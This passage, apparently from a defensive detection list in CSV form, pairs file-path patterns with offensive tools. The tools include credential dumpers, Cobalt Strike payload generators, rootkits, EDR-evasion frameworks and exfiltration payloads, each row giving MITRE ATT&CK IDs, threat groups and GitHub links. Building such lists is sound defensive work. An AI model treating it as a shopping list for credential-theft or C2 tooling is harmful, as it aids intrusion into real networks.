T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*/creddump7*.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*/creddump7/*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/creddump7/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/Credentials/*.ccache*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/Credentials/firefox_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/Credentials/msol_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/credentials/SudoSnatch*,offensive_tool_keyword,sudoSnatch,sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker 
remotely/locally.,T1552.001 - T1056.001 - T1071.001,TA0006 - TA0004 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/credentials/wifigrabber*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/CredEnum.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/CredEnum.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/CredEnum.h*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/creditcards.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/CredPhisher/*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/CredPrompt.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/CredPrompt/credprompt.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/creds-*/creds.zip*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,1,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/creds-summary.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/crlfinjection.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/Cronos-Rootkit*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*/CrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossC2/*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossC2Kit*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/CrossC2Kit/*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossC2-test*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossNet-Beta/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*/crunch-wordlist/*,offensive_tool_keyword,crunch,Generate a dictionary file containing words with a minimum and maximum length,T1596 - T1596.001,TA0043,N/A,N/A,Credential 
Access,https://sourceforge.net/projects/crunch-wordlist/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/crypt0p3g/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/cs2modrewrite/*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*/CS-BOFs/*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/CSExec.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*/CSExec.py.git*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with 
some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*/csharp/process_injection/*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/CSharpWinRM*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/C--Shellcode*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*/CS-Loader.go*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 